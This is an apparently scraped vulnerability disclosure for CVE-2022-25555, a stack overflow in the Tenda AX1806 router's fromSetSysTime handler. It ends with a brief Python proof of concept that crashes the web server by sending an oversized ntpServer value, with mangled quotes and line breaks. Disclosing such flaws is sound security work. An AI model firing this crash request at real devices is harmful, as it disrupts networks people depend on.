Headline
CVE-2022-25555: IoT-CVE/Tenda/AX1806/2 at main · sec-bin/IoT-CVE
Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow in the function fromSetSysTime. This vulnerability allows attackers to cause a Denial of Service (DoS) via the ntpServer parameter.
Affect device: Tenda Router AX1806 v1.0.0.1(https://www.tenda.com.cn/download/detail-3306.html)
Vulnerability Type: Stack overflow
Impact: Denial of Service(DoS)
Vulnerability description
This vulnerability lies in the /goform/SetSysTimeCfg page which influences the lastest version of Tenda Router AX1806 v1.0.0.1: https://www.tenda.com.cn/download/detail-3306.html
There is a stack overflow vulnerability in the fromSetSysTime function.
The v4 variable is obtained directly from the http request parameter ntpServer.
This function uses strcpy to copy the variable v4 to the stack variable &v33[16] without any sercuity check.
Attacker can construct a long ntpServer parameter in the http request,which causes stack overflow.
So attacker can perform denial of service attacks by causing tdhttpd to crash.
POC
Poc to crash:
import requests
url = “https://192.168.2.1/goform/SetSysTimeCfg”
ntpserver = b"a"*0x10000 timeType = “sync” r = requests.post(url, data={"timeType" : timeType ,"ntpServer" : ntpserver},verify=False) print(r.content)